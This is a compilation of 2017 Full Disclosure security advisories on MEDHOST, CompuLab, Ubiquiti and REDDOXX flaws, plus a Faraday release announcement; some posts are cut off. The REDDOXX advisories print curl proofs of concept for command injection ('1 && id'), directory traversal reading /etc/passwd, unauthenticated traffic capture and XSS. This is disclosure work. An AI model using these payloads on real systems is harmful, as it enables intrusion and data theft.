[FD] MEDHOST Connex contains hard-coded database credentials

[Allen F]

Overview


MEDHOST Connex for all versions contains hard-coded credentials that are
used for customer
database access. This is a new vulnerability not related to CVE-2016-4328.

Description


MEDHOST Connex contains hard-coded credentials that are used for customer
database
access. An attacker with knowledge of the hard-coded credentials and the
ability
to communicate directly with the database may be able to obtain
or modify sensitive patient and financial information.

Connex utilizes an IBM i DB2 user account for database access. The account
name is HMSCXPDN.
This password is hard-coded in multiple places of the application.
Customers do not have the option to change this password. The account has
elevated DB2 roles, and can access all objects or database tables on the
customer DB2 database. This account can access data through odbc, ftp, and
telnet.

Customers w/o Connex installed are still vulnerable. The MEDHOST setup
program creates this account. Connex provides connectivity to exchange
clinical information with the MEDHOST application. /1

Impact


An attacker with knowledge of the hard-coded credentials and the ability to
communicate
directly with the application database server may be able to obtain or
modify patient
and financial information.

Solution


The vendor has not issued a patch and has been unresponsive to this
information after 3 attempts
to communicate.

Restrict network access

As a general security practice, only allow connections from trusted hosts
and networks.
Restricting access would prevent an attacker from using the hard-coded
database credentials
from a blocked network location.

References

/1 http://www.clinical-innovation.com/topics/health-
it/himss-hms-launches-hms-connex-showcase-ambulatory-ehr

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Faraday v2.6: Collaborative Penetration Test and Vulnerability Management Platform

[Francisco Amato]

Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that helps users improve their
own work, the main purpose is to re-use the available tools in the
community taking advantage of them in a collaborative way!

Check out the Faraday project in Github.
https://github.com/infobyte/faraday

In the last couple of versions we added several features to allow our
users to manage more and more parts of their engagements directly from
our platform so we realized, why not also add the option to manage
methodologies and tasks? And so we did!

* Kanban Tasks View:

Now you can create your custom methodologies, add tasks, tag them and
keep track of your whole project directly from Faraday.

* Improving the Data Analysis tools:

As per your requests, we made some changes to the existing Data
Analysis tools introduced in the last release. We added the
possibility to change data configuration in order to customize charts,
a new bar chart type to show most vulnerable services and a filter for
undefined or null values.

* Executive Report clean up:

Some users reported issues with the sorting of Hosts and Evidence in
the reports. We fixed it so the hosts in grouped reports are sorted by
IP and evidence is sorted by alphabetically by name.

We know sometimes it is necessary to use special characters for
evidence names. Some of our users

* Web UI :

Now you can manually create the same vulnerability in several hosts at
once! Select as many targets as you want when creating your vulns.

 - Add vuln to multiple targets at once

Also, we made the vulnerability creation modal more consistent with
the rest of the views by starting the pagination of the targets in
page 1 instead of 0.

Changes:

- Improved Data analysis charts. Added more chart properties and data binding
- Improved target ordering in grouped reports
- Fixed bug with new line character in reports DOCX
- Adds alphabetical sort for Evidence in the Executive Report
- Fix bug updating users with no roles
- Fixed report creation with evidence names containing special chars
- Added Tasks Management to the Web UI
- Added the ability to select more than one target when creating a
vuln in the Web UI
- Merged PR #182 - problems with zonatransfer.me
- Fixed bug in Download CSV of Status report with old versions of Firefox
- Fixed formula injection vulnerability in export to CSV feature
- Fixed DOM-based XSS in the Top Services widget of the dashboard
- Fix in AppScan plugin
- Fix HTML injection in Vulnerability template
- Add new plugin: Junit XML
- Improved pagination in new vuln modal of status report
- Added "Policy Violations" field for Vulnerabilities

We hope you enjoy it, and let us know if you have any questions or comments.

Come to #BHUSA - Mandalay Bay - Business Hall (July 26th - 27th)
We will be at booth IC43
https://www.blackhat.com/us-17/event-sponsors.html#faraday

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2017-9457 CompuLab Intense PC lacks firmware signature validation

[Hal Martin]

Credits: Hal Martin
Website: watchmysys.com
Source: 
https://watchmysys.com/blog/2017/07/cve-2017-9457-compulab-intense-pc-lacks-firmware-validation/


Vendor:

CompuLab (compulab.com)


Product:

Intense PC / MintBox 2


Vulnerability type:

Platform lacks signature verification and does not validate firmware update 
before flashing


CVE Reference:

CVE-2017-9457


Summary:

Since 2013 CompuLab manufactures and sells the Intense PC (also sold under the 
name "MintBox 2"), which is a small Intel-based fanless PC sold to end-users 
and industrial customers. It was discovered that there is no signature 
validation of the UEFI firmware update file before flashing, allowing an 
attacker to silently flash a modified UEFI firmware to flash using the standard 
Phoenix update utility.

CompuLab have indicated via email that capsule signature validation is disabled 
by default by the IBV (Phoenix) for this platform. No timeline was provided to 
implement capsule signature verification.


Affected versions:

All firmware versions since product release (latest public firmware is 21 May 
2017)


Attack Vector:

An attacker tricks the user into running a malicious executable with local 
administrator privileges, which updates the system firmware to include the 
attacker's code. The attacker may instead use a known OS exploit to perform the 
upgrade remotely (without user interaction or notification).


Proof of concept:

I have created a modified firmware update which replaces the stock UEFI shell 
with the UEFI shell from EDK2. The update can be flashed from within Windows 
without any user interaction or notification. Firmware updates are not signed 
by CompuLab or verified by the existing firmware before upgrade.

The modified update, based on the 21 May 2017 firmware, can be downloaded here: 
https://watchmysys.com/blog/wp-content/uploads/2017/07/update-IPC-20170521-edk2.zip

Details of the full proof of concept can be found at the Source link above.


Mitigation:

At this time there is no means for the end user to enable Capsule Signature 
verification or to prevent the Phoenix update utility from updating the system 
firmware.

Therefore Intense PC owners should consider the following options:

- Ensure your operating system is up to date with the latest security patches. 
Do not run software from untrusted sources.
- Do not connect your Intense PC to any networks with internet access (i.e. 
air-gap the computer).
- Discontinue your use of the Intense PC and consider replacing the computer 
with one from a different manufacturer who implements signature validation for 
firmware updates.


Disclosure timeline:

6 June 2017: Issue reported to CompuLab
6 June 2017: CompuLab confirms that “Default settings of this source tree 
[Phoenix SecureCore Tiano Enhanced Intel Ivy Bridge CPU Panther Point M] has 
disabled Capsule Signature option.”
6 June 2017: Issue is reported to MITRE
6 June 2017: Vulnerability is assigned CVE-2017-9457
7 June 2017: CompuLab are informed that the vulnerability has been assigned 
CVE-2017-9457 and details of the vulnerability will be published after 45 days
22 July 2017: Details of the vulnerability are published

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products

[SEC Consult Vulnerability Lab]

SEC Consult Vulnerability Lab Security Advisory < 20170724-1 >
===
  title: Open Redirect in Login Page
product: Multiple Ubiquiti Networks products, e.g.
 TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
 AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
 AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
 BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
 locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
 NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
 NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
 Power AP N
 vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW)
  fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW)
 CVE number:
 impact: Low
   homepage: https://www.ubnt.com/
  found: 2017-03-22
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/

Business recommendation:

SEC Consult recommends not to use the devices in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Open Redirect in Login Page - HackerOne #158287
A open redirect vulnerability can be triggered by luring an attacked user to
authenticate to a Ubiquiti AirOS device by clicking on a crafted link.
This vulnerability was found earlier by another bug bounty participant
on HackerOne. It was numbered with #158287.

Proof of concept:
-
http:///login.cgi?uri=https://www.sec-consult.com

After a successful login, the user will be redirected to

https://www.sec-consult.com.

Vulnerable / tested versions:
-
Ubiquiti Networks AirRouter (v6.0.1)
Ubiquiti Networks TS-8-PRO (v1.3.4)

Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are
affected as well:
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1)
Ubiquiti Networks RM2-Ti (Version: XW v6.0.1)
Ubiquiti Networks RM5-Ti (Version: XW v6.0.1)

Vendor contact timeline:

2017-03-22: Contacting vendor via HackerOne.
2017-03-22: Vendor marked open redirect as duplicate to: #158287
The contact also states that this issue will be resolved
in the next release.
2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor
and confirmed the fix - provide at least 90 days for
customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date
to 2017-07-24.
2017-07-24: Public release of security advisory

Solution:
-
Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later.


Workaround:
---
No workaround


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of 

[FD] SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products

[SEC Consult Vulnerability Lab]

SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
===
  title: Cross-Site Scripting (XSS)
product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
 vulnerable version: Firmware v1.9.1
  fixed version: Firmware v1.9.1.1
 CVE number:
 impact: Medium
   homepage: https://www.ubnt.com
  found: 2017-04-04
 by: R. Freingruber, T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
This vulnerability can be exploited by deactivating or bypassing the
integrated XSS-filter of the Internet Explorer.

A reflected cross site scripting vulnerability was identified because of an
initialization error in "/files/index/". An attacker can exploit this
vulnerability by tricking a victim to visit a malicious website. The attacker
is able to hijack the session of the attacked user. If the user is currently
not logged in, the injected JavaScript code can start a bruteforce attack
(for example, with the default credentials ubnt:ubnt). After a session has
been established, the code has full control over the system via the CLI feature
which is basically a shell wrapper. By abusing this vulnerability an attacker
can open ports on the router or start a reverse shell.

Proof of concept:
-
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
The following URL can be used as PoC:

https://192.168.1.1/files/index/0/aaa

[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance

[RedTeam Pentesting GmbH]

Advisory: Remote Command Execution as root in REDDOXX Appliance

RedTeam Pentesting discovered a remote command execution vulnerability
in the REDDOXX appliance software, which allows attackers to execute
arbitrary command with root privileges while unauthenticated.


Details
===

Product: REDDOXX Appliance
Affected Versions: <= Build 2032 / v2.0.625
Fixed Versions: Version 2032 SP2
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Ping is one of these tools.
The interface for this tool contains two input fields, which allow users
to specify a target host and a packet count. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze how these commands
are embedded into the command-line of the ping command:


function ExecuteDiag($parameter)
{
// Here we do the main thing ...
$cmd = "ping '" . $parameter->targetHost . "' -c " . $parameter->count;

$this->PrintHeader();
$this->PrintHeadLine(array('Result Message', 'Status'));
$this->PrintOut("");

$this->PrintOut("");
passthru($cmd, $rc);
$this->PrintOut("");

$this->PrintStatus($rc);
$this->PrintOut("");
$this->PrintEnd();

$result = new stdClass;
$result->ResultCode = $rc;
$result->MessageText = "";

$this->SaveResult($result);
}


As can be seen in the listing above, the parameters are embedded into a
string stored in the variable $cmd. The target host parameter is
surrounded with single quotes, while the count parameter is not.

Before the parameters are actually embedded into the ping command-line
however, the following function performs a check for "illegal
characters":


public static function CheckShellParameter($parameter, $key = "")
{
if (!is_array($parameter))
$parameter = array($parameter);

foreach ($parameter as $value) {
if (preg_match("/[';<>\"]/", $value)) {
$paramNameMsg = "";
if ($key)
$paramNameMsg = " in parameter '$key'";
throw new Exception("Invalid value" . $paramNameMsg . ". Illegal 
characters found.", 1);
}
}
}


These are characters, which can be used to append additional commands to
the command line. While this check prevents certain kinds of attacks, it
is incomplete and can therefore be bypassed. For example, && (AND) and
|| (OR) operators can still be used to append additional commands to the
command-line. Submitting a count target host of "127.0.0.1" and a count
of "1 || id" leads to the following command-line being passed to the PHP
passthru() function and executed:


ping '127.0.0.1' -c 1 || id


This causes the command "id" to be executed after the execution of the
ping command is completed.


Proof of Concept


The following curl command-lines can be used to trigger the
vulnerability.

First, the diagnose function ping is called as follows:


$ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",'\
'"Parameter":{"targetHost":"127.0.0.1","count":"1'\
'&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' \
http://www.example.com/api/v1/rws/diagnose/start


Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
only used to distinguish the output of the "id" command in the final
result, which can be retrieved and displayed using the following curl
command-line:

[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

[RedTeam Pentesting GmbH]

Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers
unauthenticated access to the diagnostic functions of the administrative
interface of the REDDOXX appliance. The functions allow, for example, to
capture network traffic on the appliance's interfaces.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Tcpdump is one of these
tools. This tool can be used to capture network traffic on local
interfaces.

During a penetration test, it was discovered that this function, as well
as the other diagnostic functions, does not require authentication.


Proof of Concept


The following curl command-line can be used to start the capture
process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
http://www.example.com/api/v1/rws/diagnose/start
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 14:58:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


The following curl command-line stops the capture process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump"}' \
http://www.example.com/api/v1/rws/diagnose/stop
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 15:00:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


After the capture process is complete, the resulting capture file can be
downloaded without authentication:


$ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
[...]
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
Saving to: ‘tcpdump.cap’
tcpdump.cap 100%[===>]
1.72M [...]
2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530]


None of these requests contain any credentials or cookies, which could
provide authentication.


Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The diagnostic functions of the REDDOXX appliance can be used without
authentication. This allows attackers to, for example, capture network
traffic. During a penetration test it was possible to capture multiple
emails and also POP3 login attempts with cleartext credentials. This is
rated as a high risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

[RedTeam Pentesting GmbH]

Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in 
REDDOXX Appliance

RedTeam Pentesting discovered an arbitrary file disclosure vulnerability
in the REDDOXX appliance software, which allows unauthenticated
attackers to list directory contents and download arbitrary files from
the affected system with root permissions.

Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


When using the user frontend of the REDDOXX appliance [0] reachable via
http://www.example.com/rws/user/, HTTP POST requests are used to perform
certain actions. For example, the following request is used to save the
settings of the current user's profile:


POST /RdxEngine/json HTTP/1.1
Host: www.example.com
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close

{
"method": "CoreService.SaveUserProfile",
"params": {
"Profile": {
"UseHtmlMail": true,
"DefaultArchiveDisplayPeriode": "5",
"ReportLanguage": "en",
"EnableQueueReport": true
}
},
"id": "{----}"
}


Through analysis of the .NET binaries pertaining to this endpoint,
extracted from the appliance ISO offered on the vendor's homepage [1],
the methods handling these requests were examined. For the
"SaveUserProfile" method, which is specified through the POST parameter
"method", the code is as follows:


// Reddoxx.Api.Legacy.CoreServiceService
public void SaveUserProfile(TRoUserProfile Profile)
{
try
{
this.client.OnStartRequest("CoreService", "SaveUserProfile");
this.Service.SaveUserProfile(Profile);
this.client.OnEndRequest("CoreService", "SaveUserProfile");
}
catch (System.Exception e)
{
this.client.HandleException("CoreService", "SaveUserProfile", e);
}
}


The "TroUserProfile" class contains information about the parameters
that are required for valid requests to this method:


namespace Reddoxx.Api.Legacy
{
[...]
public class TRoUserProfile : ComplexType
{
private string __ReportLanguage;

private int __DefaultArchiveDisplayPeriode;

private bool __EnableQueueReport;

private bool __UseHtmlMail;

[...]
}
}


These variable names correspond to the POST parameters contained in the
request that was created when the profile was saved. With this knowledge
about how methods are called and parameters are passed, it was attempted
to call other methods from different packages. It was determined that it
is possible to access certain methods which allow reading arbitrary
files and directory listings.

It was later discovered that the process handling requests to the
vulnerable methods runs with root privileges.


Proof of Concept


At least two methods are found to be of interest for attackers:
FileTransfer.GetDirectoryList, which returns a directory listing for a
path specified via a parameter, and FileTransfer.DownloadFile, which
returns the file specified via a parameter in Base64-encoded form. The
following curl command-lines can be used to call the respective methods:


$ curl --silent --data-binary '{"id":"{----}",'\
'"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"

[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

[RedTeam Pentesting GmbH]

Advisory: Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

RedTeam Pentesting discovered an arbitrary file disclosure
vulnerability in the REDDOXX appliance software, which allows
unauthenticated attackers to download arbitrary files from the affected
system.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The REDDOXX appliance [0] contains a PHP script called download.php. It
is available at http://www.example.com/download.php in normal
installations and resides at /opt/reddoxx/local/htdocs/download.php in
the local filesystem of the appliance. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze this file and any
other file in a typical REDDOXX appliance installation.

The file contains the following source code (shortened to relevant
sections):


 '') {
   $file = $fileName;
   $fileID = basename($fileName);
 }

 // Currently we only allow downloads from session directories
 if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) &&
 (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) {
 die('File is not in session directory: ' . $file);
 }

 if(!file_exists($file))
 {
 [...]
 }
 else
 {
 // Set headers
 header('Pragma: public');
 header('Expires: 0');
 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
 header('Cache-Control: private' ,false);

 header('Content-Description: File Transfer');
 header('Content-Disposition: attachment; filename="' . $fileID. '"');
 header('Content-Type: application/octet-stream');
 header('Content-Transfer-Encoding: binary');
 header('Content-Length: ' . filesize($file));

 // Read the file from disk
 readfile($file);
 }
?>


The script expects a URL parameter called "file" and stores its value in
the variable $fileName. The value of this variable is then copied to the
variable $file, which undergoes two different checks: First, the
function strpos() is used to check whether a certain substring is
contained in the value of the variable. The second check used the function
file_exists() to determine whether the file specified in the variable is
present in the filesystem.

In order to circumvent the first check, a path such as


/opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd


can be specified, as there are no protections against directory
traversal in place. This path also passes the second check imposed by
the function file_exists(). Having bypassed both checks, attackers are
now able to reach the readfile() function and download arbitrary files.

Since no authentication checks are in place, the disclosure of arbitrary
files if also possible for unauthenticated attackers.

The same functionality is vulnerable to a cross-site scripting
vulnerability as described in rt-sa-2017-003 [2].


Proof of Concept


The following curl command-line can be used to trigger the vulnerability:


$ curl --silent 'http://www.example.com/download.php?file='\
'/opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance

[RedTeam Pentesting GmbH]

Advisory: Cross-Site Scripting in REDDOXX Appliance

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the REDDOXX appliance software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-003
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The REDDOXX appliance [0] contains a PHP script called download.php. It
is available at http://www.example.com/download.php in normal
installations and resides at /opt/reddoxx/local/htdocs/download.php on
the local filesystem of the appliance. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze this file and any
other file in a typical REDDOXX appliance installation.

The file contains the following source code (shortened to the relevant
sections):


 '') {
   $file = $fileName;
   $fileID = basename($fileName);
 }

 // Currently we only allow downloads from session directories
 if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) &&
 (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) {
 die('File is not in session directory: ' . $file);
 }

if(!file_exists($file))
 {
 // File doesn't exist, output error
 die('File not found: ' . $file);
 }
 else
 {
 [...]
 }
?>


The script expects a URL parameter called "file" and stores its value in
the variable $fileName. The value of this variable is then copied to the
variable $file, which undergoes two different checks: First, the
function strpos() is used to check whether a certain substring is
contained in the value of the variable. The second check uses the function
file_exists() to determine whether the file specified in the variable is
present in the filesystem. If either of these checks fail, the value of
the variable $file, which is controlled by the attacker via the URL
parameter, is embedded unencoded into an error message which is returned
to the user with a content-type of "text/html".


Proof of Concept


The following curl command-lines can be used to trigger the
vulnerability at both locations of the PHP script:


$ curl --include 'http://www.example.com/download.php?file='\
'alert("RedTeam%20Pentesting")'
HTTP/1.1 200 OK
[...]
Content-Length: 78
Content-Type: text/html

File is not in session directory: alert("RedTeam Pentesting")



$ curl --include 'http://www.example.com/download.php?file='\
'alert("RedTeam%20Pentesting")'
HTTP/1.1 200 OK
[...]
Content-Length: 92
Content-Type: text/html

File not found: alert("RedTeam 
Pentesting")


In both cases, the response containing the error messages is returned
with the Content-Type header set to "text/html", causing the browser
to execute the injected JavaScript code.

The same functionality is vulnerable to an arbitrary file disclosure
attack as described in rt-sa-2017-004 [2] and indicated by the second
curl command.


Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The vulnerability allows attackers to extract user's emails from the
REDDOXX appliance. However, as a session ID stored in the DOM of the
website is used for authentication rather than cookies, the attacked
user must first log in. Once attackers have access to the user's session
ID, the victim's browser can be instrumented to retrieve emails stored
in the system and send them to a system under the attacker's control.
